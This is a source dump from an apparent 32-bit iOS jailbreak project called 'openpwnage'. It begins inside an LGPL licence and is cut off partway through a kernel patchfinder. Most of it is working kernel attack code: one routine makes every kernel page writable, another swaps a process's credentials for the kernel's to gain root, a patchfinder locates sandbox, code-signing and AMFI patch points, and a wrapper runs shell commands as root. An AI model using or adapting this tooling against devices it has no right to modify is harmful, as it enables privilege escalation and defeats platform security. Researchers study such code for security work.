MERCHANTABILITY AND FITNESS FOR A PARTICULAR 443 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE 444 | LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME 445 | THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 
446 | 447 | 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN 448 | WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY 449 | AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU 450 | FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR 451 | CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE 452 | LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING 453 | RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A 454 | FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF 455 | SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH 456 | DAMAGES. 457 | 458 | END OF TERMS AND CONDITIONS 459 | 460 | How to Apply These Terms to Your New Libraries 461 | 462 | If you develop a new library, and you want it to be of the greatest 463 | possible use to the public, we recommend making it free software that 464 | everyone can redistribute and change. You can do so by permitting 465 | redistribution under these terms (or, alternatively, under the terms of the 466 | ordinary General Public License). 467 | 468 | To apply these terms, attach the following notices to the library. It is 469 | safest to attach them to the start of each source file to most effectively 470 | convey the exclusion of warranty; and each file should have at least the 471 | "copyright" line and a pointer to where the full notice is found. 472 | 473 | 474 | Copyright (C) 475 | 476 | This library is free software; you can redistribute it and/or 477 | modify it under the terms of the GNU Lesser General Public 478 | License as published by the Free Software Foundation; either 479 | version 2.1 of the License, or (at your option) any later version. 480 | 481 | This library is distributed in the hope that it will be useful, 482 | but WITHOUT ANY WARRANTY; without even the implied warranty of 483 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU 484 | Lesser General Public License for more details. 485 | 486 | You should have received a copy of the GNU Lesser General Public 487 | License along with this library; if not, write to the Free Software 488 | Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 489 | USA 490 | 491 | Also add information on how to contact you by electronic and paper mail. 492 | 493 | You should also get your employer (if you work as a programmer) or your 494 | school, if any, to sign a "copyright disclaimer" for the library, if 495 | necessary. Here is a sample; alter the names: 496 | 497 | Yoyodyne, Inc., hereby disclaims all copyright interest in the 498 | library `Frob' (a library for tweaking knobs) written by James Random 499 | Hacker. 500 | 501 | , 1 April 1990 502 | Ty Coon, President of Vice 503 | 504 | That's all there is to it! -------------------------------------------------------------------------------- /openpwnage/LGPL/kpmapAndCo.h: -------------------------------------------------------------------------------- 1 | // 2 | // kpmapAndCo.h 3 | // openpwnage 4 | // 5 | // Created by Zachary Keffaber on 6/15/22. 
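//

#ifndef kpmapAndCo_h
#define kpmapAndCo_h

#include <mach/mach.h>
#include <stdbool.h>
#include <stdint.h>

/*
 * Kernel pmap patch + credential theft helpers for 32-bit kernels (the
 * supported builds are listed in rootify()'s version table).
 *
 * Everything here needs a send right to the kernel task (tfp0) and the
 * kernel base; kread_uint32/kwrite_uint32/olog/find_kernel_pmap/
 * hardcoded_allproc/KernelVersion come from jailbreak.h.
 */

/* Clear the read-only (APX) bit on every L1 section and L2 small-page entry
 * of the kernel pmap so every mapped kernel page becomes writable.  Changed
 * L2 entries are recorded so pmap_unpatch() can restore them; rewritten L1
 * section entries are NOT recorded and are not undone. */
void patch_kernel_pmap(task_t tfp0, uintptr_t kernel_base);

/* Re-set the APX bit on every L2 entry recorded by patch_kernel_pmap(). */
void pmap_unpatch(task_t tfp0);

/* Run patch_kernel_pmap(), then prove it by writing a marker word at
 * kernel_base, reading it back and restoring the original word.
 * kaslr_slide is currently unused.  Returns true iff the marker was read back. */
bool is_pmap_patch_success(task_t tfp0, uintptr_t kernel_base, uintptr_t kaslr_slide);

/* Walk allproc, point this process' p_ucred at the kernel's ucred and
 * setuid(0).  kaslr_slide is currently unused.  Returns true only when the
 * process actually ends up with uid 0. */
bool rootify(task_t tfp0, uintptr_t kernel_base, uintptr_t kaslr_slide);

/* printf-style wrapper around `sh -c <formatted cmd>` that blocks until the
 * child exits.  The formatted text reaches the shell verbatim and this runs
 * as root after rootify(): only ever pass fixed command strings. */
void run_cmd(char *cmd, ...);

#endif /* kpmapAndCo_h */
--------------------------------------------------------------------------------
/openpwnage/LGPL/kpmapAndCo.m:
--------------------------------------------------------------------------------
//kpmap patch from jk
//
// NOTE(review): the #import/#include targets did not survive this rendering;
// the list below is reconstructed from what the file uses (NSArray and
// KernelVersion() -> Foundation, vm_write/task_t -> mach, posix_spawn,
// waitpid, vasprintf, usleep/getpid/setuid -> libc).

#import <Foundation/Foundation.h>
#include <errno.h>
#include <mach/mach.h>
#include <spawn.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>
#include "kpmapAndCo.h"
#include "../jailbreak.h"

#define TTB_SIZE 4096          /* L1 translation table entries (4 GB / 1 MB sections) */
#define L2_ENTRIES 256         /* entries in a coarse second-level table (1 MB / 4 KB) */
#define L1_SECT_S_BIT (1 << 16)
#define L1_SECT_PROTO (1 << 1) /* 0b10 */
#define L1_SECT_AP_URW ((1 << 10) | (1 << 11))
#define L1_SECT_APX (1 << 15)
#define L1_SECT_DEFPROT (L1_SECT_AP_URW | L1_SECT_APX)
#define L1_SECT_SORDER (0) /* 0b00, not cacheable, strongly ordered. */
#define L1_SECT_DEFCACHE (L1_SECT_SORDER)
#define L1_PROTO_TTE(entry) ((entry) | L1_SECT_S_BIT | L1_SECT_DEFPROT | L1_SECT_DEFCACHE)
#define L2_APX_BIT 0x200       /* bit 9 of a small-page entry; cleared => writable */

/*
 * Kernel VAs of every L2 entry we changed, so pmap_unpatch() can undo them.
 * The worst case is one entry per page of every coarse table
 * (TTB_SIZE * L2_ENTRIES); the old TTB_SIZE-entry array could overflow
 * since one L1 entry alone can produce 256 records.
 */
#define PMAPS_MAX (TTB_SIZE * L2_ENTRIES)
uint32_t pmaps[PMAPS_MAX];
int pmapscnt = 0;

void patch_kernel_pmap(task_t tfp0, uintptr_t kernel_base) {
    uint32_t kernel_pmap = find_kernel_pmap(kernel_base);
    uint32_t kernel_pmap_store = kread_uint32(kernel_pmap, tfp0);
    /* pmap_store: +0 = TTB virtual address, +4 = TTB physical address. */
    uint32_t tte_virt = kread_uint32(kernel_pmap_store, tfp0);
    uint32_t tte_phys = kread_uint32(kernel_pmap_store + 4, tfp0);

    olog("kernel pmap store @ 0x%08x\n",
         kernel_pmap_store);
    olog("kernel pmap tte is at VA 0x%08x PA 0x%08x\n",
         tte_virt,
         tte_phys);

    /*
     * every page is writable
     */
    for (uint32_t i = 0; i < TTB_SIZE; i++) {
        uint32_t addr = tte_virt + (i << 2);
        uint32_t entry = kread_uint32(addr, tfp0);
        if (entry == 0) continue;

        if ((entry & 0x3) == 1) {
            /*
             * Low two bits == 01: a coarse page table.  Bits [31:10] hold its
             * physical address; translate it to a kernel VA with the same
             * phys->virt delta as the TTB itself, then patch all 256 entries.
             */
            uint32_t second_level_page_addr = (entry & (~0x3ff)) - tte_phys + tte_virt;
            for (int j = 0; j < L2_ENTRIES; j++) {
                uint32_t sladdr = second_level_page_addr + (j << 2);
                uint32_t slentry = kread_uint32(sladdr, tfp0);
                if (slentry == 0)
                    continue;

                /* clear the APX bit (bit 9) */
                uint32_t new_entry = slentry & ~L2_APX_BIT;
                if (slentry == new_entry)
                    continue;

                if (pmapscnt >= PMAPS_MAX) {
                    /* Never change an entry we cannot record: it could not be
                     * undone by pmap_unpatch(), and writing past pmaps[]
                     * would corrupt this process. */
                    olog("pmaps full (%d entries), leaving L2 entry @ 0x%08x unpatched\n",
                         pmapscnt, sladdr);
                    continue;
                }
                kwrite_uint32(sladdr, new_entry, tfp0);
                pmaps[pmapscnt++] = sladdr;
            }
            continue;
        }

        /* Low two bits == 10: a 1 MB section.  Rewritten in place and not
         * recorded, so pmap_unpatch() leaves these writable. */
        if ((entry & L1_SECT_PROTO) == 2) {
            uint32_t new_entry = L1_PROTO_TTE(entry);
            new_entry &= ~L1_SECT_APX;
            kwrite_uint32(addr, new_entry, tfp0);
        }
    }

    olog("every page is actually writable\n");
    usleep(100000);
}

void pmap_unpatch(task_t tfp0) {
    /* Undo in reverse order of recording.  Only the APX bit is put back;
     * the rest of the entry is whatever the kernel holds now. */
    while (pmapscnt > 0) {
        uint32_t sladdr = pmaps[--pmapscnt];
        uint32_t slentry = kread_uint32(sladdr, tfp0);
        kwrite_uint32(sladdr, slentry | L2_APX_BIT, tfp0);
    }
}

bool is_pmap_patch_success(task_t tfp0, uintptr_t kernel_base, uintptr_t kaslr_slide) {
    (void)kaslr_slide; /* unused; kept for the call sites */

    patch_kernel_pmap(tfp0, kernel_base);

    olog("check pmap patch\n");

    /*
     * Probe: overwrite the first word at kernel_base with a marker, read it
     * back, then restore the original word.  If the patch did not take, the
     * marker does not land and `after` still equals `before`.  (A kernel whose
     * first word already equals the marker would report failure - not a
     * concern for a Mach-O image, but worth knowing.)
     */
    const uint32_t marker = 0x41414141;
    uint32_t before = kread_uint32(kernel_base, tfp0);
    kwrite_uint32(kernel_base, marker, tfp0);
    uint32_t after = kread_uint32(kernel_base, tfp0);
    kwrite_uint32(kernel_base, before, tfp0);

    if ((before != after) && (after == marker)) {
        olog("pmap patched!\n");
        return true;
    }
    olog("pmap patch failed\n");
    return false;
}

bool rootify(task_t tfp0, uintptr_t kernel_base, uintptr_t kaslr_slide) {
    (void)kaslr_slide; /* unused; kept for the call sites */

    olog("stealing kernel creds\n");

    uintptr_t allproc_addr = kernel_base + hardcoded_allproc();
    uint32_t proc = kread_uint32(allproc_addr, tfp0);
    olog("uint32_t allproc at 0x%08lx\n", (unsigned long)allproc_addr);

    if (proc == 0) {
        // fail
        olog("allproc is empty\n");
        return false;
    }

    uint32_t myproc = 0;
    uint32_t kernproc = 0;
    uint32_t mypid = (uint32_t)getpid();

    //thanks to Jake James for his rootlessJB writeup, plus spv. this was already in 9.3.5fun and while i can easily redo this to be my own eh I'm lazy and spv's works fine.
    /*
     * Walk the allproc list: next pointer at +0, p_pid at +8 (offsets as used
     * by the original code).  Stop when both procs are found OR the list
     * ends - the old loop only stopped on the former and would have read from
     * address 0 (and spun) if either proc was missing.
     */
    while (proc != 0 && (myproc == 0 || kernproc == 0)) {
        uint32_t kpid = kread_uint32(proc + 8, tfp0);
        if (kpid == mypid) {
            myproc = proc;
            olog("found myproc 0x%08x, %d\n", myproc, kpid);
        } else if (kpid == 0) {
            kernproc = proc;
            olog("found kernproc 0x%08x, %d\n", kernproc, kpid);
        }
        proc = kread_uint32(proc, tfp0); //go to next process
    }
    if (myproc == 0 || kernproc == 0) {
        olog("could not find myproc/kernproc in allproc\n");
        return false;
    }

    /* offsetof(struct proc, p_ucred) per xnu build (KernelVersion()). */
    uint32_t proc_ucred_offset;
    if ([@[@"3248.61.1~1",@"3248.60.9~1",@"3248.60.8~1",@"3248.60.4~1",@"3248.60.3~3",@"3248.50.21~4",@"3248.50.20~1",@"3248.50.18~1",@"3248.41.4~2",@"3248.41.4~3",@"3248.41.3~1",@"3248.40.173.0.1~1",@"3248.40.166.0.1~1",@"3248.40.155.1.1~3"] containsObject:KernelVersion()]) { //9.3b1-9.3.6
        proc_ucred_offset = 0xa4;
        olog("using 0xa4\n");
    } else if ([@[@"3248.31.3~2",@"3248.21.2~1",@"3248.21.1~2",@"3248.20.39~8",@"3248.20.33.0.1~7",@"3248.10.42~4",@"3248.10.41~1",@"3248.10.38~3",@"3248.10.27~1",@"3789.70.16~4"] containsObject:KernelVersion()]) { //9.1b1-9.2.1 & 10.3.3
        proc_ucred_offset = 0x98;
        olog("using 0x98\n");
    } else { //iOS 9.0b1-9.0.2 (and I think 8.4.1 too)
        proc_ucred_offset = 0x8c;
        olog("using 0x8c\n");
    }

    uint32_t kern_ucred = kread_uint32(kernproc + proc_ucred_offset, tfp0);
    olog("uint32_t kern_ucred at 0x%08x\n", kern_ucred);

    /* Point our p_ucred at the kernel's ucred.  NOTE(review): the ucred's
     * reference count is not bumped (same as the original). */
    kern_return_t kr = vm_write(tfp0, myproc + proc_ucred_offset, (vm_offset_t)&kern_ucred, 4);
    if (kr != KERN_SUCCESS) {
        olog("vm_write of p_ucred failed: %d\n", (int)kr);
        return false;
    }

    setuid(0);
    if (getuid() != 0) {
        /* Don't report success on the strength of the write alone. */
        olog("ucred swapped but getuid() != 0\n");
        return false;
    }

    olog("got root\n");

    return true;
}

extern char **environ;

//eh fuck it I'm lazy, later in a future build this won't be used
/*
 * SECURITY: the formatted string is handed to `sh -c` as-is, and by the time
 * this is called the process is root (see rootify).  Any caller that formats
 * user-controlled or file-derived text into `cmd` has a shell injection.
 * Keep every call site a fixed command string.
 */
void run_cmd(char *cmd, ...) {
    pid_t pid;
    va_list ap;
    char* cmd_ = NULL;

    va_start(ap, cmd);
    int formatted = vasprintf(&cmd_, cmd, ap);
    va_end(ap);
    if (formatted < 0 || cmd_ == NULL) {
        olog("run_cmd: vasprintf failed");
        return;
    }

    char *argv[] = {"sh", "-c", cmd_, NULL};

    int status = 0;
    olog("Run command: %s", cmd_);
    int err = posix_spawn(&pid, "/bin/sh", NULL, NULL, argv, environ);
    if (err != 0) {
        olog("posix_spawn: %s", strerror(err));
        free(cmd_); /* the old code leaked the formatted command */
        return;
    }

    olog("Child pid: %i", pid);
    for (;;) {
        if (waitpid(pid, &status, 0) == -1) {
            if (errno == EINTR)
                continue; /* interrupted: retry instead of trusting a stale status */
            perror("waitpid");
            break;
        }
        if (WIFEXITED(status) || WIFSIGNALED(status)) {
            olog("Child status %d", WEXITSTATUS(status));
            break;
        }
    }
    free(cmd_);
}
--------------------------------------------------------------------------------
/openpwnage/LGPL/patchfinder.h:
--------------------------------------------------------------------------------
/*
 * this is a patchfinder
 * but bad
 *
 * Conventions shared by the finders in patchfinder.m:
 *   region  - the kernel virtual address kdata[0] was read from; used to turn
 *             a kdata offset into the pointer value the kernel would hold
 *             (see find_proc_enforce).
 *   kdata   - a copy of the kernel image, ksize bytes long.
 *   version - iOS version string ("9.3", ...); finders compare strtof() of it.
 *
 * Every result is an OFFSET from kdata, not a virtual address.  Failure
 * values are inconsistent: most finders return (uint32_t)-1, the search-mask
 * based ones (e.g. find_vm_fault_enter_patch, find_vm_map_enter_patch)
 * return 0, and find_substrate1_and_2 returns NULL (its non-NULL result is
 * malloc'd and must be free()d).  Check the convention of the one you call.
 */

#ifndef patchfinder_h
#define patchfinder_h

#include <stddef.h>
#include <stdint.h>

struct offsets_t {
    uint32_t mount_common;
    uint32_t lwvm1;
    uint32_t lwvm2;
    uint32_t lwvm_call;
    uint32_t lwvm_call_offset;
    uint32_t sbops;
    uint32_t substrate1;
    uint32_t substrate2;
    uint32_t proc_enforce;
    uint32_t cs_enforcement_disable_amfi;
    uint32_t PE_i_can_has_debugger_1;
    uint32_t PE_i_can_has_debugger_2;
    uint32_t PE_i_can_has_debugger_offset;
    uint32_t vm_fault_enter_patch;
    uint32_t vm_map_enter_patch;
    uint32_t csops;
    uint32_t mapForIO;
    uint32_t sandbox_call_i_can_has_debugger;
    uint32_t amfi_file_check_mmap;
    uint32_t allproc;
    uint32_t tfp0;
};

uint32_t find_lwvm1 (uint32_t region, uint8_t* kdata, size_t ksize, char* version);
uint32_t find_lwvm2 (uint32_t region, uint8_t* kdata, size_t ksize, char* version);
uint32_t find_lwvm_call (uint32_t region, uint8_t* kdata, size_t ksize);
uint32_t find_lwvm_call_offset (uint32_t region, uint8_t* kdata, size_t ksize);
uint32_t find_substrate1 (uint32_t region, uint8_t* kdata, size_t ksize);
uint32_t find_substrate2 (uint32_t region, uint8_t* kdata, size_t ksize);
uint32_t* find_substrate1_and_2 (uint32_t region, uint8_t* kdata, size_t ksize, char* version);
uint32_t find_proc_enforce (uint32_t region, uint8_t* kdata, size_t ksize);
uint32_t find_vm_fault_enter_patch (uint32_t region, uint8_t* kdata, size_t ksize);
uint32_t find_vm_map_enter_patch (uint32_t region, uint8_t* kdata, size_t ksize);
uint32_t find_csops (uint32_t region, uint8_t* kdata, size_t ksize);
uint32_t find_mapForIO (uint32_t region, uint8_t* kdata, size_t ksize);
uint32_t find_sandbox_call_i_can_has_debugger (uint32_t region, uint8_t* kdata, size_t ksize);
uint32_t find_amfi_file_check_mmap (uint32_t region, uint8_t* kdata, size_t ksize);
uint32_t find_allproc (uint32_t region, uint8_t* kdata, size_t ksize, char* version);
uint32_t find_tfp0 (uint32_t region, uint8_t* kdata, size_t ksize, char* version);
uint32_t find_sbops(uint32_t region, uint8_t* kdata, size_t ksize);
uint32_t find_mount_common(uint32_t region, uint8_t* kdata, size_t ksize);
uint32_t find_cs_enforcement_disable_amfi(uint32_t region, uint8_t* kdata, size_t ksize);

#endif /* patchfinder_h */
--------------------------------------------------------------------------------
/openpwnage/LGPL/patchfinder.m:
--------------------------------------------------------------------------------
//iOS 9 patchfinder is by spv
//
// NOTE(review): the #include targets did not survive this rendering; the list
// below is reconstructed from what the file uses (memmem/memset/strlen,
// strtof/malloc, printf, fixed-width integer types).

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "patchfinder.h"
#include "../jailbreak.h"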
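/*
 * iOS 9 only right now
 *
 * Thumb-2 decode helpers for find_literal_ref().  Each takes a pointer to the
 * first halfword of an instruction; the 32-bit forms also read the second
 * halfword (*(i + 1)), so the caller must guarantee it is inside kdata.
 * Field positions follow the ARMv7 Thumb encodings named in the comments.
 */

#define IS_IOS_9 1

/* Bits [start:end] of x shifted down to bit 0 (start >= end, both <= 31). */
static uint32_t bit_range(uint32_t x, int start, int end) {
    x = (x << (31 - start)) >> (31 - start);
    x = (x >> end);
    return x;
}

/* Rotate right by `places`; only called with 8 <= places < 32. */
static uint32_t ror(uint32_t x, int places) {
    return (x >> places) | (x << (32 - places));
}

/* ThumbExpandImm(): the 12-bit "modified immediate" of MOV.W/TST.W/AND.W...
 * imm12<11:10> == 00 replicates imm8 into the byte lanes chosen by <9:8>;
 * otherwise it is (0x80 | imm12<6:0>) rotated right by imm12<11:7>. */
static int thumb_expand_imm_c(uint16_t imm12) {
    if (bit_range(imm12, 11, 10) == 0) {
        switch (bit_range(imm12, 9, 8)) {
            case 0:
                return bit_range(imm12, 7, 0);
            case 1:
                return (bit_range(imm12, 7, 0) << 16) | bit_range(imm12, 7, 0);
            case 2:
                return (bit_range(imm12, 7, 0) << 24) | (bit_range(imm12, 7, 0) << 8);
            case 3:
                return (bit_range(imm12, 7, 0) << 24) | (bit_range(imm12, 7, 0) << 16) | (bit_range(imm12, 7, 0) << 8) | bit_range(imm12, 7, 0);
            default:
                return 0;
        }
    } else {
        uint32_t unrotated_value = 0x80 | bit_range(imm12, 6, 0);
        return ror(unrotated_value, bit_range(imm12, 11, 7));
    }
}

/* First halfword of a 32-bit encoding: top bits 111xx with xx != 00. */
static int insn_is_32bit(uint16_t* i) {
    return (*i & 0xe000) == 0xe000 && (*i & 0x1800) != 0x0;
}

/* LDR (literal): T1 `LDR Rt, [PC, #imm8*4]` (0x48xx) or
 * T2 `LDR.W Rt, [PC, #+/-imm12]` (F8DF/F85F xxxx). */
static int insn_is_ldr_literal(uint16_t* i) {
    return (*i & 0xF800) == 0x4800 || (*i & 0xFF7F) == 0xF85F;
}

static int insn_ldr_literal_rt(uint16_t* i) {
    if ((*i & 0xF800) == 0x4800) {
        return (*i >> 8) & 7;
    } else if ((*i & 0xFF7F) == 0xF85F) {
        return (*(i + 1) >> 12) & 0xF;
    } else {
        return 0;
    }
}

/* Byte offset from Align(PC,4) for LDR (literal).  T1 is always positive.
 * T2 carries the sign in the U bit, which is bit 7 of the first halfword
 * (F8DF = add, F85F = subtract).  The previous code tested bit 11 (0x0800),
 * which is fixed at 1 in this encoding, so every T2 literal load decoded as
 * a positive offset and negative ones loaded the wrong word. */
static int insn_ldr_literal_imm(uint16_t* i) {
    if ((*i & 0xF800) == 0x4800) {
        return (*i & 0xFF) << 2;
    } else if ((*i & 0xFF7F) == 0xF85F) {
        return (*(i + 1) & 0xFFF) * (((*i & 0x0080) == 0x0080) ? 1 : -1);
    } else {
        return 0;
    }
}

/* LDR (register): T1 `LDR Rt, [Rn, Rm]` (0x58xx) or T2 `LDR.W Rt, [Rn, Rm]`
 * with a zero shift.  Not static: exported for other finders. */
int insn_ldr_reg_rt(uint16_t* i) {
    if ((*i & 0xFE00) == 0x5800) {
        return *i & 0x7;
    } else if ((*i & 0xFFF0) == 0xF850 && (*(i + 1) & 0x0FC0) == 0x0000) {
        return (*(i + 1) >> 12) & 0xF;
    } else {
        return 0;
    }
}

int insn_ldr_reg_rm(uint16_t* i) {
    if ((*i & 0xFE00) == 0x5800) {
        return (*i >> 6) & 0x7;
    } else if ((*i & 0xFFF0) == 0xF850 && (*(i + 1) & 0x0FC0) == 0x0000) {
        return *(i + 1) & 0xF;
    } else {
        return 0;
    }
}

/* ADD (register): T1 `ADDS Rd, Rn, Rm` (0x18xx), T2 `ADD Rdn, Rm` (0x44xx,
 * any register including PC - the PC-relative form the VM cares about), or
 * T3 `ADD.W Rd, Rn, Rm` (EB0x xxxx). */
static int insn_is_add_reg(uint16_t* i) {
    if ((*i & 0xFE00) == 0x1800) {
        return 1;
    } else if ((*i & 0xFF00) == 0x4400) {
        return 1;
    } else if ((*i & 0xFFE0) == 0xEB00) {
        return 1;
    } else {
        return 0;
    }
}

static int insn_add_reg_rd(uint16_t* i) {
    if ((*i & 0xFE00) == 0x1800) {
        return (*i & 7);
    } else if ((*i & 0xFF00) == 0x4400) {
        return (*i & 7) | ((*i & 0x80) >> 4); /* DN:Rdn */
    } else if ((*i & 0xFFE0) == 0xEB00) {
        return (*(i + 1) >> 8) & 0xF;
    } else {
        return 0;
    }
}

static int insn_add_reg_rn(uint16_t* i) {
    if ((*i & 0xFE00) == 0x1800) {
        return ((*i >> 3) & 7);
    } else if ((*i & 0xFF00) == 0x4400) {
        return (*i & 7) | ((*i & 0x80) >> 4); /* T2: Rn == Rd */
    } else if ((*i & 0xFFE0) == 0xEB00) {
        return (*i & 0xF);
    } else {
        return 0;
    }
}

static int insn_add_reg_rm(uint16_t* i) {
    if ((*i & 0xFE00) == 0x1800) {
        return (*i >> 6) & 7;
    } else if ((*i & 0xFF00) == 0x4400) {
        return (*i >> 3) & 0xF;
    } else if ((*i & 0xFFE0) == 0xEB00) {
        return *(i + 1) & 0xF;
    } else {
        return 0;
    }
}

/* MOVT T1: `MOVT Rd, #imm16` (F2Cx xxxx); imm16 = imm4:i:imm3:imm8. */
static int insn_is_movt(uint16_t* i) {
    return (*i & 0xFBF0) == 0xF2C0 && (*(i + 1) & 0x8000) == 0;
}

static int insn_movt_rd(uint16_t* i) {
    return (*(i + 1) >> 8) & 0xF;
}

static int insn_movt_imm(uint16_t* i) {
    return ((*i & 0xF) << 12) | ((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF);
}

/* MOV (immediate): T1 `MOVS Rd, #imm8` (0x2xxx), T2 `MOV.W Rd, #const`
 * (F04F xxxx, modified immediate) or T3 `MOVW Rd, #imm16` (F24x xxxx). */
static int insn_is_mov_imm(uint16_t* i) {
    if ((*i & 0xF800) == 0x2000) {
        return 1;
    } else if ((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0) {
        return 1;
    } else if ((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0) {
        return 1;
    } else {
        return 0;
    }
}

static int insn_mov_imm_rd(uint16_t* i) {
    if ((*i & 0xF800) == 0x2000) {
        return (*i >> 8) & 7;
    } else if ((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0) {
        return (*(i + 1) >> 8) & 0xF;
    } else if ((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0) {
        return (*(i + 1) >> 8) & 0xF;
    } else {
        return 0;
    }
}

/* Immediate of MOV (immediate).  T1 carries a full 8-bit immediate; the
 * previous mask (0xF) kept only its low nibble, so `MOVS Rd, #0x10..#0xFF`
 * loaded a wrong value into find_literal_ref()'s register file. */
static int insn_mov_imm_imm(uint16_t* i) {
    if ((*i & 0xF800) == 0x2000) {
        return *i & 0xFF;
    } else if ((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0) {
        return thumb_expand_imm_c(((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF));
    } else if ((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0) {
        return ((*i & 0xF) << 12) | ((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF);
    } else {
        return 0;
    }
}

// Find PC-relative references to a certain address (relative to kdata). This is basically a virtual machine that only cares about instructions used in PC-relative addressing, so no branches, etc.
/*
 * Scans forward from `insn` to the end of kdata, tracking a 16-entry register
 * file: MOV-immediate and PC-relative LDR set a register, MOVT ORs in the high
 * half, `ADD Rx, PC` adds the current PC (insn + 4).  Returns the MOVT or ADD
 * whose result first equals `address`, or NULL.  `region` is unused.
 * Values are offsets relative to kdata, so `address` must be one too.
 */
static uint16_t* find_literal_ref(uint32_t region, uint8_t* kdata, size_t ksize, uint16_t* insn, uint32_t address) {
    (void)region;
    uint16_t* current_instruction = insn;
    uintptr_t kend = (uintptr_t)kdata + ksize;
    uint32_t value[16];
    memset(value, 0, sizeof(value));

    while ((uintptr_t)current_instruction < kend) {
        /* The 32-bit decoders below read *(i + 1); the old loop let a 32-bit
         * opcode in the final halfword read two bytes past kdata. */
        if (insn_is_32bit(current_instruction) &&
            (uintptr_t)current_instruction + 2 * sizeof(uint16_t) > kend) {
            break;
        }

        if (insn_is_mov_imm(current_instruction)) {
            value[insn_mov_imm_rd(current_instruction)] = insn_mov_imm_imm(current_instruction);
        } else if (insn_is_ldr_literal(current_instruction)) {
            /* literal = Align(PC, 4) + imm, PC being this instruction + 4 */
            uintptr_t literal_address = (uintptr_t)kdata + ((((uintptr_t)current_instruction - (uintptr_t)kdata) + 4) & 0xFFFFFFFC) + insn_ldr_literal_imm(current_instruction);
            if (literal_address >= (uintptr_t)kdata && (literal_address + 4) <= kend) {
                value[insn_ldr_literal_rt(current_instruction)] = *(uint32_t*)(literal_address);
            }
        } else if (insn_is_movt(current_instruction)) {
            int reg = insn_movt_rd(current_instruction);
            value[reg] |= insn_movt_imm(current_instruction) << 16;
            if (value[reg] == address) {
                return current_instruction;
            }
        } else if (insn_is_add_reg(current_instruction)) {
            int reg = insn_add_reg_rd(current_instruction);
            if (insn_add_reg_rm(current_instruction) == 15 && insn_add_reg_rn(current_instruction) == reg) {
                value[reg] += ((uintptr_t)current_instruction - (uintptr_t)kdata) + 4;
                if (value[reg] == address) {
                    return current_instruction;
                }
            }
        }

        current_instruction += insn_is_32bit(current_instruction) ? 2 : 1;
    }

    return NULL;
}

/* One halfword of a pattern: (insn & mask) must equal value. */
struct find_search_mask {
    uint16_t mask;
    uint16_t value;
};

// Search the range of kdata for a series of 16-bit values that match the search mask.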
233 | static uint16_t* find_with_search_mask(uint32_t region, uint8_t* kdata, size_t ksize, int num_masks, const struct find_search_mask* masks) { 234 | uint16_t* end = (uint16_t*)(kdata + ksize - (num_masks * sizeof(uint16_t))); 235 | uint16_t* cur; 236 | for (cur = (uint16_t*)kdata; cur <= end; cur++) { 237 | int matched = 1; 238 | int i; 239 | for (i = 0; i < num_masks; i++) { 240 | if ((*(cur + i) & masks[i].mask) != masks[i].value) { 241 | matched = 0; 242 | break; 243 | } 244 | } 245 | 246 | if (matched) 247 | return cur; 248 | } 249 | 250 | return NULL; 251 | } 252 | 253 | uint32_t find_lwvm1(uint32_t region, uint8_t* kdata, size_t ksize, char* version) { 254 | float version_float = strtof(version, 0); 255 | for (uint32_t i = 0; i < ksize; i++) { 256 | if (version_float == (float)9.3) { 257 | if (*(uint64_t*)&kdata[i] == 0x2501d1030f01f01b && *(uint32_t*)&kdata[i+0x8] == 0x2501e016) { 258 | uint32_t lwvm1 = i - 0x10; 259 | printf("[*] found lwvm1: 0x%08x\n", lwvm1); 260 | return lwvm1; 261 | } 262 | } else if (version_float == (float)9.0) { 263 | if ((*(uint64_t*)&kdata[i] & 0x00ffffffffffffff) == 0xd4d0060f01f010) { 264 | uint32_t lwvm1 = i - 0x10; 265 | printf("[*] found lwvm1: 0x%08x\n", lwvm1); 266 | return lwvm1; 267 | } 268 | } else { 269 | if (*(uint32_t*)&kdata[i] == 0x0f01f010 && *(uint8_t*)&kdata[i+0x5] == 0xd0 && *(uint32_t*)&kdata[i+0xe] == 0x0f40f010 && *(uint8_t*)&kdata[i+0x13] == 0xd0) { 270 | uint32_t lwvm1 = i - 0x10; 271 | printf("[*] found lwvm1: 0x%08x\n", lwvm1); 272 | return lwvm1; 273 | } 274 | } 275 | } 276 | return -1; 277 | } 278 | 279 | uint32_t find_lwvm2(uint32_t region, uint8_t* kdata, size_t ksize, char* version) { 280 | float version_float = strtof(version, 0); 281 | for (uint32_t i = 0; i < ksize; i++) { 282 | if (version_float == (float)9.3) { 283 | if (*(uint64_t*)&kdata[i] == 0x2501d1030f01f01b && *(uint32_t*)&kdata[i+0x8] == 0x2501e016) { 284 | uint32_t lwvm2 = i + 0x4; 285 | printf("[*] found 